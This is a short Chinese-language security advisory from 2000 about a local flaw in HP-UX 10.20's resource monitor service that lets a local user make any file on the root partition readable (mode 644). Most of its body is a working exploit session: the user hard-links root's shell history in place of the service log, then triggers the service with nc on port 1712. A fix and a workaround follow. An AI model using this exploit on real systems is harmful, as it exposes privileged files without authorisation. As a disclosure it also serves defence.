HP-UX资源管理器服务(漏洞利用)

/ns/ld/unix/data/20010108025620.htm

发布日期:2000-11-8

摘要
HP-UNIX资源管理器服务中的一个漏洞允许攻击者(有本地访问权的)改变ROOT分区上的任何文件到644模式.

细节
受影响系统:
HP-UX 10.20

免疫系统:
HP-UX 11

漏洞利用:
$ uname -sr
HP-UX B.10.20
$ cd /etc/opt/resmon/log
$ mv registrar.log registrar.log.orig
$ ls -l /.sh_history
-rw------- 1 root sys 3316 Sep 20 15:22 /.sh_history
$ ln /.sh_history registrar.log
$ nc hpux.example.com 1712 < /etc/motd
$ ls -l /.sh_history
-rw-r--r-- 2 root sys 3605 Nov 8 09:45 /.sh_history
$ rm -f registrar.log
$ mv registrar.log.orig registrar.log

这样, /.sh_history 变为可读, 其中的文件也一样


解决方案:
HP-UX 11中漏洞已经修复.

措施:
$ chmod +t /etc/opt/resmon/log